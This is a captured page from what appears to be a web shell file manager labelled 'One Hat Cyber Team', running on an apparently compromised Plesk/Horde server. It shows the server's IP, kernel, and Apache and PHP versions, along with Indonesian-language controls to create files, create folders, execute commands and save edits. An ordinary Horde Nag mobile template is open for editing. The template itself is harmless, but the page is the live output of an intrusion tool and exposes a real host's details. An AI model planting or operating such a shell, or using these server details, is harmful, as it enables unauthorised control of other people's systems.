⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.82
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
nag
/
templates
/
smartmobile
/
Edit File: main.html.php
<div data-role="page" id="nag-list"> <?php echo $this->smartmobileHeader(array('backlink' => array('#nag-lists', _("Lists")), 'logout' => true, 'title' => _("My Tasks"))) ?> <div data-role="content" class="ui-body"> <div id="nag-notasks" style="display:none;"><?php echo _("No tasks to display") ?></div> <ul data-role="listview"></ul> </div> <div data-role="footer" data-id="nag-footer" data-position="fixed"> <div data-role="navbar"> <ul> <li><a href="#nag-taskform-view" data-rel="dialog" data-transition="slideup" data-icon="plus"><?php echo _("New") ?></a></li> </ul> </div> </div> </div>
Simpan